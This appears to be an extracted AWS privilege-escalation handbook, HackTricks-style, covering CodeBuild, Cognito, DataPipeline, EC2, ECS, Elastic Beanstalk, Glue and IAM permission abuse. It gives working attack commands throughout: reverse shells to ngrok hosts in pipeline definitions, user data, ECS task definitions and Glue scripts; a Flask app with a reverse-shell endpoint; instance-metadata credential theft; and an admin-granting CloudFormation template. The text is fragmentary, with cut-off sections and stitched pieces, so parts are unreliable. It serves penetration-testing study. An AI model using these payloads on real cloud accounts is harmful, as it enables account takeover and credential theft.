Cognito Privesc
Datapipeline Privesc
DynamoDB Privesc
EBS Privesc
EC2 Privesc
ECR Privesc
ECS Privesc
EFS Privesc
EMR Privesc
Glue Privesc
IAM Privesc
KMS Privesc
Lambda Privesc
Lightsail Privesc
MQ Privesc
MSK Privesc
RDS Privesc
Redshift Privesc
S3 Privesc
Sagemaker Privesc
Secrets Privesc
SSM Privesc
STS Privesc
Misc (Other Techniques) Privesc
Tools
https://github.com/RhinoSecurityLabs/Security-
Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
Pacu
References
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-
mitigation-part-2/
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-
mitigation/
https://bishopfox.com/blog/privilege-escalation-in-aws
https://hackingthe.cloud/aws/exploitation/local-priv-esc-user-data-s3/
Potential Impact: You cannot privesc with this technique but you might
get access to sensitive info.
apigateway:GET
With this permission you can get generated API keys of the APIs
configured (per region).
Potential Impact: You cannot privesc with this technique but you might
get access to sensitive info.
JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n
build:\\\\n commands:\\\\n - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/service-
role/codebuild-CI-Build-service-role-2\"
}"
REV_PATH="/tmp/rev.json"
# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH
# Build it
aws codebuild start-build --project-name codebuild-demo-project
iam:PassRole ,
codebuild:UpdateProject ,
( codebuild:StartBuild |
codebuild:StartBuildBatch )
Just like in the previous section, if instead of creating a build project you
can modify it, you can indicate the IAM Role and steal the token
REV="envn - curl
http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
aws-datapipeline-codepipeline-codebuild-and-codecommit.md
iam:PassRole ,
codepipeline:CreatePipeline ,
codebuild:CreateProject,
codepipeline:StartPipelineExecution
When creating a code pipeline you can indicate a codepipeline IAM Role
to run, therefore you could compromise them.
Apart from the previous permissions you would need access to the place
where the code is stored (S3, ECR, github, bitbucket...)
I tested this doing the process in the web page, the permissions indicated
previously are the not List/Get ones needed to create a codepipeline, but for
creating it in the web you will also need:
codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects,
codebuild:ListRepositories, codecommit:ListRepositories,
events:PutTargets, codepipeline:ListPipelines, events:PutRule,
codepipeline:ListActionTypes, cloudtrail:<several>
During the creation of the build project you can indicate a command to
run (rev shell?) and to run the build phase as privileged user, that's the
configuration the attacker needs to compromise:
? codebuild:UpdateProject,
codepipeline:UpdatePipeline,
codepipeline:StartPipelineExecution
It might be possible to modify the role used and the command executed on
a codepipeline with the previous permissions.
codestar-createproject-codestar-associateteammember.md
iam:PassRole ,
codestar:CreateProject
With these permissions you can abuse a codestar IAM Role to perform
arbitrary actions through a cloudformation template. Check the
following page:
iam-passrole-codestar-createproject.md
codestar:CreateProject ,
codestar:AssociateTeamMember
This technique uses codestar:CreateProject to create a codestar project,
and codestar:AssociateTeamMember to make an IAM user the owner of a
new CodeStar project, which will grant them a new policy with a few
extra permissions.
PROJECT_NAME="supercodestar"
If you are already a member of the project you can use the permission
codestar:UpdateTeamMember to update your role to owner instead of
codestar:AssociateTeamMember
Potential Impact: Privesc to the codestar policy generated. You can find an
example of that policy in:
codestar-createproject-codestar-associateteammember.md
codestar:CreateProjectFromTemplate
1. Use codestar:CreateProjectFromTemplate to create a new project.
i. You will be granted access to cloudformation:UpdateStack on a
stack that has the “CodeStarWorker-\-CloudFormation�? IAM
role passed to it.
2. Use the CloudFormation permissions to update the target stack with a
CloudFormation template of your choice.
i. The name of the stack that needs to be updated will be
“awscodestar-\-infrastructure�? or “awscodestar-\-lambda�?,
depending on what template is used (in the example exploit script,
at least).
At this point, you would now have full access to the permissions granted to
the CloudFormation IAM role. You won’t be able to get full administrator
with this alone; you’ll need other misconfigured resources in the
environment to help you do that.
"arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner"
]
},
{
"Sid": "2",
"Effect": "Allow",
"Action": [
"codestar:DescribeUserProfile",
"codestar:ListProjects",
"codestar:ListUserProfiles",
"codestar:VerifyServiceRole",
"cloud9:DescribeEnvironment*",
"cloud9:ValidateEnvironmentName",
"cloudwatch:DescribeAlarms",
"cloudwatch:GetMetricStatistics",
"cloudwatch:ListMetrics",
"codedeploy:BatchGet*",
"codedeploy:List*",
"codestar-connections:UseConnection",
"ec2:DescribeInstanceTypeOfferings",
"ec2:DescribeInternetGateways",
"ec2:DescribeNatGateways",
"ec2:DescribeRouteTables",
"ec2:DescribeSecurityGroups",
"ec2:DescribeSubnets",
"ec2:DescribeVpcs",
"events:ListRuleNamesByTarget",
"iam:GetAccountSummary",
"iam:GetUser",
"iam:ListAccountAliases",
"iam:ListRoles",
"iam:ListUsers",
"lambda:List*",
"sns:List*"
],
"Resource": [
"*"
]
},
{
"Sid": "3",
"Effect": "Allow",
"Action": [
"codestar:*UserProfile",
"iam:GenerateCredentialReport",
"iam:GenerateServiceLastAccessedDetails",
"iam:CreateAccessKey",
"iam:UpdateAccessKey",
"iam:DeleteAccessKey",
"iam:UpdateSSHPublicKey",
"iam:UploadSSHPublicKey",
"iam:DeleteSSHPublicKey",
"iam:CreateServiceSpecificCredential",
"iam:UpdateServiceSpecificCredential",
"iam:DeleteServiceSpecificCredential",
"iam:ResetServiceSpecificCredential",
"iam:Get*",
"iam:List*"
],
"Resource": [
"arn:aws:iam::947247140022:user/${aws:username}"
]
}
]
}
To exploit this you need to create a S3 bucket that is accessible from the
attacked account. Upload a file called toolchain.json . This file should
contain the cloudformation template exploit. The following one can be
used to set a managed policy to a user under your control and give it admin
permissions:
toolchain.json
{
"Resources": {
"supercodestar": {
"Type": "AWS::IAM::ManagedPolicy",
"Properties": {
"ManagedPolicyName": "CodeStar_supercodestar",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
},
"Users": [
"<compromised username>"
]
}
}
}
}
../../../../.gitbook/assets/empty.zip
Remember that the bucket with both files must be accessible by the
victim account.
With both things uploaded you can now proceed to the exploitation
creating a codestar project:
PROJECT_NAME="supercodestar"
aws-cloudformation-and-codestar-enum.md
iam:PassRole ,
cloudformation:CreateStack
An attacker with the iam:PassRole and cloudformation:CreateStack
In the following page you have an exploitation example with the additional
permission cloudformation:DescribeStacks :
iam-passrole-cloudformation-createstack-and-cloudformation-
describestacks.md
iam:PassRole ,
( cloudformation:UpdateStack |
cloudformation:SetStackPolicy )
In this case you can abuse an existing cloudformation stack to update it
and escalate privileges as in the previous scenario:
cloudformation:UpdateStack |
cloudformation:SetStackPolicy
If you have this permission but no iam:PassRole you can still update the
stacks used and abuse the IAM Roles they have already attached. Check
the previous section for exploit example (just don't indicate any role in the
update).
iam:PassRole ,
(( cloudformation:CreateChangeSet ,
cloudformation:ExecuteChangeSet ) |
cloudformation:SetStackPolicy )
An attacker with permissions to pass a role and create & execute a
ChangeSet can create/update a new cloudformation stack abuse the
cloudformation service roles just like with the CreateStack or
UpdateStack.
--change-set-type UPDATE
iam:PassRole ,
( cloudformation:CreateStackSet |
cloudformation:UpdateStackSet )
An attacker could abuse these permissions to create/update StackSets to
abuse arbitrary cloudformation roles.
cloudformation:UpdateStackSet
An attacker could abuse this permission without the passRole permission to
update StackSets to abuse the attached cloudformation roles.
Wait for a couple of minutes for the stack to be generated and then get the
output of the stack where the credentials are stored:
aws cloudformation describe-stacks \
--stack-name arn:aws:cloudformation:us-west2:
[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
--region uswest-2
References
https://bishopfox.com/blog/privilege-escalation-in-aws
aws-cognito-enum
cognito-
identity:SetIdentityPoolRoles ,
iam:PassRole
With this permission you can grant any cognito role to the
authenticated/unauthenticated users of the cognito app.
aws cognito-identity set-identity-pool-roles \
--identity-pool-id <identity_pool_id> \
--roles unauthenticated=<role ARN>
# Get credentials
## Get one ID
aws cognito-identity get-id --identity-pool-id "eu-west-
2:38b294756-2578-8246-9074-5367fc9f5367"
## Get creds for that id
aws cognito-identity get-credentials-for-identity --identity-id
"eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374" ole
If the cognito app doesn't have unauthenticated users enabled you might
need also the permission cognito-identity:UpdateIdentityPool to
enable it.
cognito-identity:update-identity-
poo l
An attacker with this permission could set for example a Cognito User Pool
under his control or any other identity provider where he can login as a way
to access this Cognito Identity Pool. Then, just login on that user provider
will allow him to access the configured authenticated role in the
Identity Pool.
# This example is using a Cognito User Pool as identity
provider
## but you could use any other identity provider
aws cognito-identity update-identity-pool \
--identity-pool-id <value> \
--identity-pool-name <value> \
[--allow-unauthenticated-identities | --no-allow-
unauthenticated-identities] \
--cognito-identity-providers ProviderName=user-pool-
id,ClientId=client-id,ServerSideTokenCheck=false
# Now you need to login to the User Pool you have configured
## after having the id token of the login continue with the
following commands:
Potential Impact: Privesc to other Cognito groups or even all the Cognito
roles if the attacker can access to any Cognito user.
cognito-idp:AdminConfirmSignUp
This permission allows to verify a signup. By default anyone can sign in
Cognito applications, if that is left, a user could create an account with any
data and verify it with this permission.
aws cognito-idp admin-confirm-sign-up \
--user-pool-id <value> \
--username <value>
Potential Impact: Indirect privesc to the identity pool IAM role for
authenticated users if you can register a new user**.** Indirect privesc to
other app functionalities being able to confirm any account.
cognito-idp:AdminCreateUser
This permission would allow an attacker to create a new user inside the user
pool. The new user is created as enabled, but will need to change its
password.
Potential Impact: Direct privesc to the identity pool IAM role for
authenticated users**.** Indirect privesc to other app functionalities being
able to create any user
cognito-idp:AdminEnableUser
This permissions can help in. a very edge-case scenario where an attacker
found the credentials of a disabled user and he needs to enable it again.
Potential Impact: Indirect privesc to the identity pool IAM role for
authenticated users and permissions of the user if the attacker had
credentials for a disabled user.
cognito-idp:AdminInitiateAuth ,
cognito-
idp:AdminRespondToAuthChallenge
This permission allows to login with the method
ADMIN_USER_PASSWORD_AUTH. For more information follow the
link.
cognito-idp:AdminSetUserPassword
This permission would allow an attacker to change the password of any
user, making him able to impersonate any user (that doesn't have MFA
enabled).
aws cognito-idp admin-set-user-password \
--user-pool-id <value> \
--username <value> \
--password <value> \
--permanent
Potential Impact: Direct privesc to potentially any user, so access to all the
groups each user is member of and access to the Identity Pool authenticated
IAM role.
cognito-idp:AdminSetUserSettings |
cognito-idp:SetUserMFAPreference |
cognito-idp:SetUserPoolMfaConfig |
cognito-idp:UpdateUserPool
AdminSetUserSettings: An attacker could potentially abuse this
permission to set a mobile phone under his control as SMS MFA of a user.
UpdateUserPool: It's also possible to update the user pool to change the
MFA policy. Check cli here.
cognito-
idp:AdminUpdateUserAttributes
An attacker with this permission could change the email or phone number
of any other attribute of a user under his control to try to obtain more
privileges in an underlaying application.\ This allows to change an email or
phone number and set it as verified.
aws cognito-idp admin-update-user-attributes \
--user-pool-id <value> \
--username <value> \
--user-attributes <value>
cognito-idp:CreateUserPoolClient |
cognito-idp:UpdateUserPoolClient
An attacker with this permission could create a new User Pool Client less
restricted than already existing pool clients. For example, the new client
could allow any kind of method to authenticate, don't have any secret, have
token revocation disabled, allow tokens to be valid for a longer period...
The same can be be don if instead of creating a new client, an existing one
is modified.
In the command line (or the update one) you can see all the options, check
it!.
cognito-idp:CreateUserImportJob |
cognito-idp:StartUserImportJob
An attacker could abuse this permission to create users y uploading a csv
with new users.
# Both options before will give you a URL where you can send
the CVS file with the users to create
curl -v -T "PATH_TO_CSV_FILE" \
-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
(In the case where you create a new import job you might also need the iam
passrole permission, I haven't tested it yet).
Potential Impact: Direct privesc to the identity pool IAM role for
authenticated users**.** Indirect privesc to other app functionalities being
able to create any user.
cognito-
idp:CreateIdentityProvider |
cognito-idp:UpdateIdentityProvider
An attacker could create a new identity provider to then be able to login
through this provider.
Potential Impact: Direct privesc to the identity pool IAM role for
authenticated users**.** Indirect privesc to other app functionalities being
able to create any user.
TODO: cognito-sync:*
Support HackTricks and get benefits!
AWS - Datapipeline Privesc
Support HackTricks and get benefits!
datapipeline
For more info about datapipeline check:
aws-datapipeline-codepipeline-codebuild-and-codecommit.md
iam:PassRole ,
datapipeline:CreatePipeline ,
datapipeline:PutPipelineDefinition
, datapipeline:ActivatePipeline
An attacker with the iam:PassRole , datapipeline:CreatePipeline ,
datapipeline:PutPipelineDefinition, and
datapipeline:ActivatePipeline permissions would be able to escalate
privileges by creating a pipeline and updating it to run an arbitrary
AWS CLI command or create other resources, either once or on an
interval with the permissions of the role that was passed in.
Which will create an empty pipeline. The attacker then needs to update the
definition of the pipeline to tell it what to do, with a command like this:
{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >&
/dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}
Note that the role in line 14, 15 and 27 needs to be a role assumable by
datapipeline.amazonaws.com and the role in line 28 needs to be a role
assumable by ec2.amazonaws.com with a EC2 profile instance.
Moreover, the EC2 instance will only have access to the role assumable by
the EC2 instance (so you can only steal that one).
aws-directory-services-workdocs.md
ds:ResetUserPassword
This permission allows to change the password of any existent user in the
Active Directory.\ By default, the only existent user is Admin.
And then grant them an AWS IAM role for when they login, this way an
AD user/group will have access over AWS management console:
There isn't apparently any way to enable the application access URL, the
AWS Management Console and grant permission
aws-dynamodb-enum.md
dynamodb:BatchGetItem
An attacker with this permissions will be able to get items from tables by
the primary key (you cannot just ask for all the data of the table). This
means that you need to know the primary keys (you can get this by getting
the table metadata ( describe-table ).
// With a.json
{
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could
put here entries from 1 to 1000 to dump all those
}
}
]
}
}
Potential Impact: Indirect privesc by locating sensitive information in the
table
dynamodb:GetItem
Similar to the previous permissions this one allows a potential attacker to
read values from just 1 table given the primary key of the entry to retrieve:
// With a.json
{
"Id" : {
"N": "205"
}
}
method like:
aws dynamodb transact-get-items \
--transact-items file:///tmp/a.json
// With a.json
[
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
]
dynamodb:Query
Similar to the previous permissions this one allows a potential attacker to
read values from just 1 table given the primary key of the entry to retrieve.
It allows to use a subset of comparisons, but the only comparison allowed
with the primary key (that must appear) is "EQ", so you cannot use a
comparison to get the whole DB in a request.
aws dynamodb query --table-name ProductCatalog --key-conditions
file:///tmp/a.json
// With a.json
{
"Id" : {
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
}
dynamodb:Scan
You can use this permission to dump the entire table easily.
dynamodb:PartiQLSelect
You can use this permission to dump the entire table easily.
aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"
but you need to specify the primary key with a value, so it isn't that useful.
dynamodb:ExportTableToPointInTime|
(dynamodb:UpdateContinuousBackups)
This permission will allow an attacker to export the whole table to a S3
bucket is his election:
Note that for this to work the table needs to have point-in-time-recovery
enabled, you can check if the table has it with:
aws dynamodb describe-continuous-backups \
--table-name <tablename>
If it isn't enabled, you will need to enable it and for that you need the
dynamodb:ExportTableToPointInTime permission:
aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum
ec2:CreateSnapshot
Any AWS user possessing the EC2:CreateSnapshot permission can steal
the hashes of all domain users by creating a snapshot of the Domain
Controller mounting it to an instance they control and exporting the
NTDS.dit and SYSTEM registry hive file for use with Impacket's
secretsdump project.
aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum
iam:PassRole , ec2:RunInstances
An attacker with the iam:PassRole and ec2:RunInstances permissions
can create a new EC2 instance that they will have operating system access
to and pass an existing EC2 instance profile to it. They can then login to
the instance and request the associated AWS keys from the EC2 instance
meta data, which gives them access to all the permissions that the
associated instance profile/service role has.
You can run a new instance using a created ssh key ( --key-name ) and
then ssh into it (if you want to create a new one you might need to have the
permission ec2:CreateKeyPair ).
You can run a new instance using a user data ( --user-data ) that will
send you a rev shell. You don't need to specify security group this way.
echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' >
/tmp/rev.sh
Privesc to ECS
With this set of permissions you could also create an EC2 instance and
register it inside an ECS cluster. This way, ECS services will be run in
inside the EC2 instance where you have access and then you can penetrate
those services (docker containers) and steal their ECS roles attached.
To learn how to force ECS services to be run in this new EC2 instance
check:
aws-ecs-privesc.md
If the instance profile has a role and the attacker cannot remove it, there
is another workaround. He could find an instance profile without a role or
create a new one ( iam:CreateInstanceProfile ), add the role to that
instance profile (as previously discussed), and associate the instance
profile compromised to a compromised instance:
Potential Impact: Direct privesc to a different EC2 role (you need to have
compromised a AWS EC2 instance and some extra permission or specific
instance profile status).
ec2:RequestSpotInstances , iam:Pass
Role
An attacker with the permissions
ec2:RequestSpotInstances and iam:PassRole can request a Spot
Instance with an EC2 Role attached and a rev shell in the user data.\
Once the instance is run, he can steal the IAM role.
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)
ec2:ModifyInstanceAttribute
An attacker with the ec2:ModifyInstanceAttribute can modify the
instances attributes. Among them, he can change the user data, which
implies that he can make the instance run arbitrary data. Which can be
used to get a rev shell to the EC2 instance.
Note that the attributes can only be modified while the instance is
stopped, so the permissions ec2:StopInstances and
ec2:StartInstances .
TEXT='Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
--//'
TEXT_PATH="/tmp/text.b64.txt"
ec2:CreateLaunchTemplateVersion , e
c2:CreateLaunchTemplate , ec2:Modify
LaunchTemplate
An attacker with the permissions
ec2:CreateLaunchTemplateVersion , ec2:CreateLaunchTemplate and
ec2:ModifyLaunchTemplate can create a new Launch Template version
with a rev shell in the user data and any EC2 IAM Role on it, change the
default version, and any Autoscaler group using that Launch Template
that is configured to use the latest or the default version will re-run the
instances using that template and will execute the rev shell.
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)
autoscaling:CreateLaunchConfigurat
ion , autoscaling:CreateAutoScalingG
roup , iam:PassRole
An attacker with the permissions
autoscaling:CreateLaunchConfiguration , autoscaling:CreateAutoScali
ec2-instance-
connect:SendSSHPublicKey
An attacker with the permission ec2-instance-
Potential Impact: Direct privesc to the EC2 IAM roles attached to running
instances.
ec2-instance-
connect:SendSerialConsoleSSHPublicK
ey
An attacker with the permission ec2-instance-
In order to connect to the serial port you also need to know the username
and password of a user inside the machine.
This way isn't that useful to privesc as you need to know a username and
password to exploit it.
aws-ecs-ecr-and-eks-enum.md
ecr:GetAuthorizationToken , ecr:Bat
chCheckLayerAvailability , ecr:Compl
eteLayerUpload , ecr:InitiateLayerUp
load , ecr:PutImage , ecr:UploadLayer
Part
An attacker with the all those permissions can login to ECR and upload
images. This can be useful to escalate privileges to other environments
where those images are being used.
aws-ecs-ecr-and-eks-enum.md
Privesc to node
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf
But moreover, EC2 uses docker to run ECR tasks, so if you can escape to
the node or access the docker socket, you can check which other
containers are being run, and even get inside of them and steal their IAM
roles attached.
Furthermore, the EC2 instance role will usually have enough permissions
to update the container instance state of the EC2 instances being used as
nodes inside the cluster. An attacker could modify the state of an instance
to DRAINING, then ECS will remove all the tasks from it and the ones
being run as REPLICA will be run in a different instance, potentially
inside the attackers instance so he can steal their IAM roles and potential
sensitive info from inside the container.
The same technique can be done by deregistering the EC2 instance from
the cluster. This is potentially less stealthy but it will force the tasks to be
run in other instances:
# Needs: ecs:SubmitContainerStateChange
aws ecs submit-container-state-change ...
# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...
iam:PassRole ,
ecs:RegisterTaskDefinition ,
ecs:RunTask
An attacker abusing the iam:PassRole , ecs:RegisterTaskDefinition
iam:PassRole ,
ecs:RegisterTaskDefinition ,
ecs:StartTask
Just like in the previous example an attacker abusing the iam:PassRole ,
ecs:RegisterTaskDefinition , ecs:StartTask permissions in ECS can
generate a new task definition with a malicious container that steals the
metadata credentials and run it.\ However, in this case, a container instance
to run the malicious task definition need to be.
iam:PassRole ,
ecs:RegisterTaskDefinition ,
( ecs:UpdateService|ecs:CreateServic
e)
Just like in the previous example an attacker abusing the iam:PassRole ,
ecs:RegisterTaskDefinition , ecs:UpdateService or
ecs:CreateService permissions in ECS can generate a new task
definition with a malicious container that steals the metadata credentials
and run it by creating a new service with at least 1 task running.
ecs:RegisterTaskDefinition ,
(ecs:RunTask|ecs:StartTask|ecs:Upd
ateService|ecs:CreateService)
This scenario is like the previous ones but without the iam:PassRole
This attack is only possible if the ECS cluster is using EC2 instances and
not Fargate.
printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >&
/dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json
printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json
ecs:ExecuteCommand ,
ecs:DescribeTasks`` ``
(ecs:RunTask|ecs:StartTask|ecs:Up
dateService|ecs:CreateService)
An attacker with the ** ecs:ExecuteCommand , ecs:DescribeTasks ** can
execute commands inside a running container and exfiltrate the IAM role
attached to it (you need the describe permissions because it's necessary to
run aws ecs execute-command ).\ However, in order to do that, the
container instance need to be running the ExecuteCommand agent (which
by default isn't).
execute-command [...]
enable-execute-command [...]
You can find examples of those options in previous ECS privesc sections.
aws-ssm-privesc.md
iam:PassRole , ec2:RunInstances
Check in the ec2 privesc page how you can abuse these permissions to
privesc to ECS:
aws-ec2-privesc.md
?ecs:RegisterContainerInstance
TODO: Is it possible to register an instance from a different AWS account
so tasks are run under machines controlled by the attacker??
References
https://ruse.tech/blogs/ecs-attack-methods
aws-efs-enum.md
elasticfilesystem:DeleteFileSystem
Policy | elasticfilesystem:PutFileSy
stemPolicy
With any of those permissions an attacker can change the file system
policy to give you access to it, or to just delete it so the default access is
granted.
To change it:
aws efs put-file-system-policy --file-system-id <fs-id> --
policy file:///tmp/policy.json
elasticfilesystem:CreateMountTarge
t
If you an attacker is inside a subnetwork where no mount target of the
EFS exists. He could just create one in his subnet with this privilege:
# You need to indicate security groups that will grant the user
access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>
elasticfilesystem:ModifyMountTarge
tSecurityGroups
In a scenario where an attacker finds that the EFS has mount target in his
subnetwork but no security group is allowing the traffic, he could just
change that modifying the selected security groups:
aws-elastic-beanstalk-enum.md
elasticbeanstalk:CreateApplication
,
elasticbeanstalk:CreateEnvironment
,
elasticbeanstalk:CreateApplication
Version ,
elasticbeanstalk:UpdateEnvironment
, iam:PassRole , and more...
The mentioned plus several S3 , EC2 , cloudformation , autoscaling
zip -r MyApp.zip .
{ % code overflow="wrap" %}
{ % code overflow="wrap" %}
elasticbeanstalk:CreateApplication
Version ,
elasticbeanstalk:UpdateEnvironment
, cloudformation:GetTemplate ,
cloudformation:DescribeStackResour
ces ,
cloudformation:DescribeStackResour
ce ,
autoscaling:DescribeAutoScalingGro
ups , autoscaling:SuspendProcesses ,
autoscaling:SuspendProcesses
First of all you need to create a legit Beanstalk environment with the code
you would like to run in the victim following the previous steps.
Potentially a simple zip containing these 2 files:
application.py
from flask import Flask, request, jsonify
import subprocess,os, socket
application = Flask(__name__)
@application.errorhandler(404)
def page_not_found(e):
return jsonify('404')
@application.route("/")
def index():
return jsonify('Welcome!')
@application.route("/get_shell")
def search():
host=request.args.get('host')
port=request.args.get('port')
if host and port:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,int(port)))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
return jsonify('done')
if __name__=="__main__":
application.run()
requirements.txt
click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1
Once you have your own Beanstalk env running your rev shell, it's time
to migrate it to the victims env. To so so you need to update the Bucket
Policy of your beanstalk S3 bucket so the victim can access it (Note that
this will open the Bucket to EVERYONE):
{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:GetObject",
"s3:GetObjectVersion",
"s3:*"
],
"Resource": [
"arn:aws:s3:::elasticbeanstalk-us-east-1-
947247140022",
"arn:aws:s3:::elasticbeanstalk-us-east-1-
947247140022/*"
]
},
{
"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
"Effect": "Deny",
"Principal": {
"AWS": "*"
},
"Action": "s3:DeleteBucket",
"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-
1-947247140022"
}
]
}
{ % code overflow="wrap" %}
# To get your rev shell just access the exposed web URL with
params such as:
http://myenv.eba-ankaia7k.us-east-
1.elasticbeanstalk.com/get_shell?
host=0.tcp.eu.ngrok.io&port=13528
aws-emr-enum.md
iam:PassRole ,
elasticmapreduce:RunJobFlow
An attacker with these permissions can run a new EMR cluster attaching
EC2 roles and try to steal its credentials.\ Note that in order to do this you
would need to know some ssh priv key imported in the account or to
import one, and be able to open port 22 in the master node (you might be
able to do this with the attributes EmrManagedMasterSecurityGroup and/or
ServiceAccessSecurityGroup inside --ec2-attributes ).
# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key
elasticmapreduce:OpenEditorInConso
le
Just with this permission an attacker will be able to access the Jupyter
Notebook and steal the IAM role associated to it.\ The URL of the
notebook is https://<notebook-id>.emrnotebooks-prod.eu-west-
1.amazonaws.com/<notebook-id>/lab/
Even if you attach an IAM role to the notebook instance in my tests I
noticed that I was able to steal AWS managed credentials and not creds
related to the IAM role related .
Now the attacker would just need to SSH into the development endpoint
to access the roles credentials.
# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest
glue:UpdateDevEndpoint ,
( glue:GetDevEndpoint |
glue:GetDevEndpoints )
An attacker with the glue:UpdateDevEndpoint permission would be able
to update the associated SSH public key of an existing Glue
development endpoint, to then SSH into it and have access to the
permissions the attached role has access to.
# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///path/to/my/public/ssh/key.pub
Now the attacker would just need to SSH into the development endpoint
to access the roles credentials. The AWS API should be accessed directly
from the new instance to avoid triggering alerts.
iam:PassRole , ( glue:CreateJob |
glue:UpdateJob ),
( glue:StartJobRun |
glue:CreateTrigger )
An attacker with those permissions can create/update a job attaching any
glue service account and start it. The job can execute arbitrary python
code, so a reverse shell can be obtained and used to steal the IAM
credentials of the attached role.
# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl
http://169.254.169.254/latest/meta-data/iam/security-
credentials/dummy
glue:UpdateJob
Just with the update permission an attacked could steal the IAM Credentials
of the already attached role.
aws-iam-and-sts-enum
iam:CreatePolicyVersion
An attacker with the iam:CreatePolicyVersion permission can create a
new version of an IAM policy that they have access to. This allows them
to define their own custom permissions. When creating a new policy
version, it needs to be set as the default version to take effect, which you
would think would require the iam:SetDefaultPolicyVersion permission,
but when creating a new policy version, it is possible to include a flag ( --
permission to use.
# Exploitation
aws iam create-policy-version --policy-arn <target_policy_arn>
\
--policy-document file:///path/to/administrator/policy.json
--set-as-default
iam:SetDefaultPolicyVersion
An attacker with the iam:SetDefaultPolicyVersion permission may be
able to escalate privileges through existing policy versions that are not
currently in use. If a policy that they have access to has versions that are
not the default, they would be able to change the default version to any
other existing version.
If the policy your are modifying the version is the same one that is
granting the attacker the SetDefaultPolicyVersion permission, and the
new version doesn't grant that permission, the attacker won't be able to
return the policy to its original state.
